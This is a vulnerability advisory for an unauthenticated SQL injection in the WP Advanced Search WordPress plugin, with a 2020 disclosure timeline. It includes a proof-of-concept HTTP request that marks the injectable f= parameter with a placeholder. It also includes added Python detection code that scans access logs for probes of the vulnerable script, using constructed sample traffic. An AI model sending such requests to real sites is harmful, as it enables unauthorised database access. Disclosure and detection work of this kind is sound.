Because the plugin builds SQL queries by string concatenation, allows direct access to the vulnerable PHP file, and does not follow best practices for SQL operations, there is an unauthenticated SQL injection in autocompletion-PHP5.5.php.
After a month of trying to contact the plugin author (via Twitter and email), we followed generally accepted disclosure guidelines.
April 1st, 2020 - Report received & Escalated to WP Plugins Team
April 1st, 2020 - WP Plugin Team Investigating & Plugin closed
April 2nd, 2020 - Disclosing
April 3rd, 2020 - v3.3.6 released, fixing the issue
Proof of Concept
GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[INJECT]&type=&e= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
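Detection logic for the request pattern shown above, as an added example that is not part of the advisory or of the plugin: it scans combined-format web access log lines for any hit on the vulnerable script path (direct access is itself the problem) and raises the severity when the f= parameter is not a plain identifier. The assumption that f= should carry a bare column/field name is ours, not something the advisory states; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the vulnerable script named in the advisory.
VULN_PATH = ("/wp-content/plugins/wp-advanced-search/class.inc/"
             "autocompletion/autocompletion-PHP5.5.php")

# Assumption for this example: a legitimate f= value is a bare field name.
IDENT_RE = re.compile(r"^[A-Za-z0-9_]*$")

# Combined log format: client ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def classify_request(line):
    """Return a finding dict for a request to the vulnerable script, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so an encoded quote shows up as a real one.
    params = parse_qs(parts.query, keep_blank_values=True)
    f_values = params.get("f", [""])
    suspicious = any(not IDENT_RE.match(v) for v in f_values)
    return {
        "client": client,
        "time": ts,
        "method": method,
        "status": status,
        "f": f_values,
        # Any access to the closed file is worth a look; a non-identifier
        # value in f= is the stronger signal.
        "severity": "high" if suspicious else "medium",
    }


def scan(lines):
    """Run classify_request over every line and keep the findings."""
    return [hit for hit in (classify_request(l) for l in lines) if hit]


# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Apr/2020:10:15:01 +0000] "GET ' + VULN_PATH +
    '?q=admin&t=wp_autosuggest&f=title&type=&e= HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Apr/2020:10:15:09 +0000] "GET ' + VULN_PATH +
    '?q=admin&t=wp_autosuggest&f=title%27&type=&e= HTTP/1.1" 200 2048',
    '192.0.2.9 - - [02/Apr/2020:10:16:00 +0000] "GET '
    '/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```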